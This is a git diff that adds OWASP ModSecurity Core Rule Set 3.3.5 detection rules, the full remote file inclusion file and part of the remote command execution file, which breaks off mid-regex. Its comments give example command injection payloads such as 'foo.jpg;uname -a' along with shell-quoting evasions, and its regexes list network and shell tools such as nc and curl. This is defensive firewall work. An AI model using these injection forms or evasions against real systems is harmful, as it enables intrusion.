@@ -0,0 +1,153 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ +# +# RFI Attacks +# + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# -=[ Rule Logic ]=- +# These rules look for common types of Remote File Inclusion (RFI) attack methods. +# - URL Contains an IP Address +# - The PHP "include()" Function +# - RFI Data Ends with Question Mark(s) (?) 
+# - RFI Host Doesn't Match Local Host +# +# -=[ References ]=- +# http://projects.webappsec.org/Remote-File-Inclusion +# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html +# +SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ + "id:931100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \ + "id:931110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ + "id:931120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character 
(?)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ + "id:931130,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "ctl:auditLogParts=+E,\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) 
+# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf new file mode 100644 index 000000000..b586045bc --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf 
@@ -0,0 +1,730 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ Unix command injection ] +# +# This rule detects Unix command injections. +# A command injection takes a form such as: +# +# foo.jpg;uname -a +# foo.jpg||uname -a +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in shell syntax, such as: ; | & $( ` <( >( +# Anatomy of the regexp with examples of patterns caught: +# +# 1. Starting tokens +# +# ; ;ifconfig +# \{ {ifconfig} +# \| |ifconfig +# \|\| ||ifconfig +# & &ifconfig +# && &&ifconfig +# \n ;\nifconfig +# \r ;\rifconfig +# \$\( $(ifconfig) +# $\(\( $((ifconfig)) +# ` `ifconfig` +# \${ ${ifconfig} +# <\( <( ifconfig ) +# >\( >( ifconfig ) +# \(\s*\) a() ( ifconfig; ); a +# +# 2. 
Command prefixes +# +# { { ifconfig } +# \s*\(\s* ( ifconfig ) +# \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ VARNAME=xyz ifconfig +# !\s* ! ifconfig +# \$ $ifconfig +# +# 3. Quoting +# +# ' 'ifconfig' +# \" "ifconfig" +# +# 4. Paths +# +# [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. +# +# This rule is case-sensitive to prevent FP ("Cat" vs. "cat"). +# +# An effort was made to combat evasions by shell quoting (e.g. 'ls', +# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine +# transformation built-in to deal with this, but unfortunately, it +# replaces ';' characters and lowercases the payload, which is less +# useful for this case. However, emulating the transformation makes +# the regexp more complex. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932100.txt] +# \b" \ +# +# This is the base Rule to prevent Unix Command Injection +# Please refer other rules 932105,932106 to know more. 
+# +# .932100 +# ├── 932105 +# ├── 932106 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t
|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\
'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ + "id:932100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + 
ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Apache 2.2 requires configuration file lines to be under 8kB. +# Therefore, some remaining commands have been split off to a separate rule. +# For explanation of this rule, see rule 932100. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932105.txt] +# \b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"
]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\